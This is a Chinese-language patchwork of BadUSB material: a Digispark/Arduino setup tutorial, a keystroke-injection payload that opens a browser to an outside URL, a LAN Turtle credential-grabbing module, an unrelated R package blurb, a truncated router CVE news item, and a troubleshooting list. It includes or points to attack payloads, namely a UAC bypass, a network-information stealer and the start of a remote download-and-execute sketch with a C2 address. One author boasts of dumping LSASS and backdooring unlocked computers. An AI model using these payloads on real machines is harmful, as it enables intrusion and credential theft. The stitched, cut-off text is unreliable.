摘要:
BadUSB最早是在2014年的黑帽大会上研究人员JakobLell和Karsten Nohl提出并展示的。不同于老式的U盘病毒,它利用了USB协议中的一个漏洞,通过模拟键盘、鼠标、网卡等从而让目标电脑执行恶意代码,达到控住主机或者窃取敏感信息等目的。
等了2个月期待已久的橡皮鸭终于到货了,在hack5上面买的https://hakshop.com ;
国内也有RadioWar基于Teensy++ 2.0 AT90USB1286芯片设计的FireGoose(烧鹅)http://wiki.radiowar.org/烧鹅
国内的部分极客也都在自己制作Badusb,大多是采用的Teensy 或者Arduino Leonardo,淘宝上还有厂商制作的U盘模样的Arduino Leonardo。
Digispark官网给出的有教程。http://digistump.com/wiki/digispark/tutorials/connecting
安装 arduino 的 IDE。https://www.arduino.cc/en/Main/Software直接从官网按照自己的操作系统下载并安装。
安装Digispark的驱动。(32位操作系统和64位操作系统安装程序不同,需注意)https://github.com/digistump/Dig … gistump.Drivers.zip
在Arduino应用程序中,进入“文件”菜单并选择“首选项”
在附加开发板管理器网址内填入并点击确定
http://digistump.com/package_digistump_index.json
注意:如果您已经在该框中输入了更多网址,请点击框右侧的按钮,然后在新行中输入此网址。
进入“工具”菜单,然后选择“开发板”子菜单 - 选择“开发板管理器”
然后从类型下拉菜单中选择“贡献”, 选择“Digistump AVR Boards”包,然后单击“安装”按钮
您将在“开发板管理器”窗口的底部栏上看到下载进度,完成后它会在列表中的该项旁边显示“已安装”。(特别慢)
安装完成后,就可以在开发板中看到Digispark了。选择默认的Digispark (Default - 16.5mhz)。
注意:在调用上传之前,不需要插入Digispark
点击上传按钮。底部状态框现在会要求您插入Digispark - 此时您需要插入它 - 或者拔下并重新插入它。
❸ Payload
关于的Digispark的payload,可以参考甚至修改它的keyboard库文件(修改可以参考usb.org)。
https://github.com/BesoBerlin/DigiKeyboard_DE/blob/master/DigiKeyboard.h
说到BadUSB的payload,就不得不提到hak5的USB-Rubber-Ducky。
https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payloads
应该是目前BadUSB里面payload最全的了,如果你懒得写,可以直接使用USB-Rubber-Ducky的payload翻译脚本
https://github.com/toxydose/Duckyspark
直接将大黄鸭的payload翻译成Digispark可用的就行了。
当然,我还是建议自己来改DigiKeyboard.h 文件和payload。
这里给出我的payload抛砖引玉
恶搞payload
void setup() {
DigiKeyboard.delay(2000);//开机延迟两秒钟,用于系统识别Digispark
DigiKeyboard.sendKeyStroke(0);
DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);//按R和win键,打开运行
DigiKeyboard.delay(100);
DigiKeyboard.sendKeyPress(KEY_LEFT_SHIFT);//按住左SHIFT,绕过输入法
DigiKeyboard.println("IEXPLORE -K HTTP://MTFLY.NET/X.HTM");
DigiKeyboard.sendKeyPress(0);//松开
DigiKeyboard.sendKeyStroke(KEY_ENTER);//按回车
DigiKeyboard.delay(2000);
DigiKeyboard.sendKeyStroke(KEY_A);//按A键,绕过第一次打开ie的提示框
void loop() {
注意:使用该payload时需要修改本地的DigiKeyboard.h,添加左shift键
#define KEY_LEFT_SHIFT 0xE1
总结
这么一个这么廉价并且win10无驱运行的BadUSB,Digispark可以算是居家旅行,杀人灭口的必备良器了。
BadUSB最早是在2014年的黑帽大会上研究人员JakobLell和Karsten Nohl提出并展示的。不同于老式的U盘病毒,它利用了USB协议中的一个漏洞,通过模拟键盘、鼠标、网卡等从而让目标电脑执行恶意代码,达到控住主机或者窃取敏感信息等目的。
注意! 对于发现此问题的任何人,它仍然是WIP,尚未准备好发布...
不要使用LAN Turtle文本“ GUI”菜单系统下载quickcreds模块。 下载/复制quickcreds文件到此仓库中,并将其放置在/ etc / turtle / modules中,完成后,输入LAN Turtle文本“ GUI”并配置该模块并启用它。 然后开始使用它。
注意! 首先,请确保您在LAN Turtle上没有其他垃圾,这在存储方面非常有限,最好的方法是从头开始,使用新刷新的6.2映像,覆盖层有130万可用空间,需要
使用ssh连接到LAN Turtle
在LAN Turtle文本“ GUI”中进入“模块”菜单
如果系统中已经有另一种Quickcred变体,请确保已停止并禁用它
钢锯是各种dplyr和purrr操作之间的粘合剂,具有一些类似tidyverse的功能(例如,保留NA,移动行值)和快捷方式(例如,过滤模式,转换,拔除等)。
您可以使用以下命令从CRAN安装发行版本的钢锯:
install.packages( " hacksaw " )
或使用以下命令从GitHub安装开发版本:
remotes :: install_github( " daranzolin/hacksaw " )
钢锯的各种拆分操作会回收原始数据帧。 当您想在同一对象上多次运行略有不同的代码(例如,赋值)或想要利用某些列表功能(例如,purrr,lengths lengths() , %->%等)时,此功能很有用。
有用的%<-%和%->%运算符从中重新导出
library( hacksaw )
library( tidyverse )
鸭子解码器
不久前,我去另一个国家接受了一些课程,对我来说很幸运,我已经有了我的
鸭子! 在我的旅行中,我经常发现自己靠近未锁定的计算机,我可以根据情况转储 lssas 或后门,为此我开始做一大堆不同的有效载荷和脚本来窃取所有这些计算机!
对我来说可悲的是,由于当时我没有使用自己的计算机(为了
安全),我删除了系统上的整个帐户,除了我备份的源文件……或者我是这么想的! 我错误地只备份了inject.bin文件,我所有的数千行源代码现在都不见了! 我想,如果我只是将 .bins 分类,我仍然可以将它们重用于 pwn 计算机,直到一台 Win 8 计算机出现可以被黑客入侵并且我的脚本都不起作用!
这个项目的结果是必须弄清楚我随着时间的推移保存的所有这些inject.bin文件中的内容,以便实时更改有效负载。 这个脚本解决了我经常丢失或意外删除我所有黑客的源代码文件的问题。
如何使用它
TB上买橡皮鸭USB开发板,也叫BadUSB,二三十块钱一个,可以通过简单编程将逻辑刷入USB固件中,插入电脑的时候,模拟键盘按键,自动执行特定逻辑。
下面是我写的一个兼容Windows和Linux的键盘按键,完成远程下载执行的功能,
#include <Keyboard.h>
// C2 Server
String szURL = "http://IP/";
void win(...
东方联盟网络安全研究人员详细介绍了 KCodes NetUSB 组件中的一个严重缺陷,该组件集成到来自 Netgear、TP-Link、Tenda、EDiMAX、D-Link 和 Western Digital 等的数百万最终用户路由器设备中。
KCodes NetUSB是一个 Linux 内核模块,它使本地网络上的设备能够通过 IP 提供基于 USB 的服务。打印机、外部硬盘驱动器和插入基于 Linux 的嵌入式系统(例如,路由器)的闪存驱动器可通过使用驱动程序的网络获得。
CVE-2021-45
Hak5 USB 橡皮鸭的全功能 UAC 旁路,修复了当 UAC 窗口不显示时在有效负载开始时不需要的“y”。
根据您的需要自定义延迟。
降低的延迟值将加快有效负载的执行速度,执行不正确的风险很小。
增加延迟值将增加成功有效载荷的机会。
最好的方法是了解您的目标,进行尽可能多的测试,以便获得平均值。
Rubber_Ducky_Gather_Network_Info
一个非常快速的橡皮鸭脚本,它利用了C:\Windows\System32 文件夹从受害者机器窃取不同的信息。
Gather_Network_Info_Script
REM gathernetworkInfo JonnyBanana 的信息窃取脚本REM REM 延迟大,因为Windows 需要很多时间来读取带有双鸭固件的Ducky 延迟 10000 图形用户界面延迟 200 STRING cmd /C“开始gatherNetworkInfo.vbs” 延迟 200 REM 以管理员身份运行CTRL-ALT ENTER 延迟 100 左箭头延迟 100 进入REM 脚本需要一点时间来创建文件.... 延迟15000 CTRL ESC 延迟 200 STRING powershell 延迟 200 进入延迟 200 REM
前段时间翻译了有关BadUSB的两篇文章《解密BadUSB:世界上最邪恶的USB外设》和《研究人员公布BadUSB攻击测试(exploit)代码》,大家反应强烈,很多人都在打听BadUSB的实现方法,或者从那里可以买到这样的U盘。原本打算本周写一篇分析已公开的BadUSB利用代码,兑现一下诺言,但实在是抽不出时间。在此先给大家介绍一下BadUSB的“老前辈”:USB
RUBBE
如果你插上BadUSB板子后没有反应,可能是以下问题之一:
1. 驱动问题:确保已经安装了正确的驱动程序,并且驱动程序已经被正确地安装。如果你不确定是否安装了正确的驱动程序,可以尝试在设备管理器中查看设备的状态。
2. 操作系统兼容性问题:BadUSB板子可能不支持你正在使用的操作系统版本。请确保你的操作系统与BadUSB板子兼容。
3. 插口问题:检查USB插口是否有损坏或者脏污。如果插口脏污,可以尝试使用棉签轻轻擦拭插口。
4. 电源问题:确保BadUSB板子的电源供应正常。如果使用的是USB接口供电,检查USB接口是否有电流输出。
如果以上解决方法都无效,建议联系BadUSB板子的厂家或者售后客服寻求帮助。